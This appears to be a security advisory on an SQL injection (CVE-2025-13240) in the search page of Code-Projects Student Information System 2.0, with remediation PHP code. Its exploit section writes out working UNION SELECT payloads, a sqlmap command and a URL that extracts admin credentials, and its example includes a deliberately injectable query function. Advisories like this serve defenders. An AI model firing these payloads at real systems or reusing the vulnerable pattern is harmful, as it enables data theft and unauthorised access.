Code-Projects Student Information System 20, SQL Injection, CVE-2025-13240 (MEDIUM)


How the mentioned CVE works:

CVE-2025-13240 is an unauthenticated SQL injection in the Code-Projects Student Information System version 2.0. It lies in the `searchquery.php` file, in the handling of the `s` parameter. When a user submits a search request, the value passed in `s` is not sanitized before being incorporated into an SQL query. A remote attacker can therefore send crafted SQL, such as a UNION SELECT statement, directly through this parameter. Because the application does not use prepared statements and does not escape user input, the injected payload is executed by the backend database. This lets an attacker read, modify, or delete sensitive information in the database, including student records and administrative credentials, without any form of authentication.
Platform: Code-Projects SIS
Version: 2.0
Vulnerability: SQL Injection
Severity: Medium
Date: 11/16/2025

Prediction: Patch expected 12/20/2025

What Undercode Says:

`curl -s "http://target.com/searchquery.php?s=' UNION SELECT 1,user(),3,4-- -"`
`sqlmap -u "http://target.com/searchquery.php?s=test" --batch --dbs`

How to Exploit:

`http://victim-system.com/searchquery.php?s=' UNION SELECT 1,username,password,4 FROM admin_users-- -`

Protection from this CVE:

Parameterized queries.

Input sanitization.

Web Application Firewall.
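
The first two protections applied to the affected endpoint, as an added example that is not the project's own code: the concatenation pattern the advisory describes (reconstructed as an assumption, since the page shows no source) next to a hardened `searchquery.php` that binds the `s` parameter with a prepared statement. The table and column names, the connection details, and the availability of `mysqli_stmt::get_result` (mysqlnd) are assumptions.

```php
<?php
// Added example, not the Code-Projects SIS source. Table/column names are assumed.

// VULNERABLE pattern as described in the advisory: the `s` parameter is pasted
// straight into the query text, so its content can change the query structure.
function search_students_vulnerable(mysqli $db, string $s): array
{
    $sql = "SELECT id, firstname, lastname, course FROM students "
         . "WHERE firstname LIKE '%" . $s . "%' OR lastname LIKE '%" . $s . "%'";
    $result = $db->query($sql);            // user-controlled SQL reaches the engine
    return $result ? $result->fetch_all(MYSQLI_ASSOC) : [];
}

// HARDENED: a prepared statement sends the query text and the data separately,
// so whatever `s` contains is only ever compared as a value.
function search_students_safe(mysqli $db, string $s): array
{
    // Bound the length and escape LIKE wildcards so a bare '%' cannot turn a
    // search into a full-table listing (backslash is MySQL's default LIKE escape).
    $s = mb_substr($s, 0, 64);
    $s = addcslashes($s, '%_\\');
    $pattern = '%' . $s . '%';

    $stmt = $db->prepare(
        "SELECT id, firstname, lastname, course FROM students "
      . "WHERE firstname LIKE ? OR lastname LIKE ?"
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed'); // never echo $db->error to users
    }
    $stmt->bind_param('ss', $pattern, $pattern);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Usage as searchquery.php would call it (connection values are placeholders).
$db = new mysqli('localhost', 'sis_user', 'DB_PASSWORD_PLACEHOLDER', 'sis');
$db->set_charset('utf8mb4');
$s = $_GET['s'] ?? '';
foreach (search_students_safe($db, $s) as $row) {
    // Output encoding guards the search results page against reflected XSS as well.
    echo htmlspecialchars($row['firstname'] . ' ' . $row['lastname'], ENT_QUOTES, 'UTF-8'), "<br>";
}
```

Input sanitization (the length cap and wildcard escaping) narrows what the search accepts, but only the bound parameter removes the injection; a WAF in front of the endpoint is defence in depth, not a replacement for either.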

Impact:

Database compromise.

Data theft.

Unauthenticated access.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub: Undercode
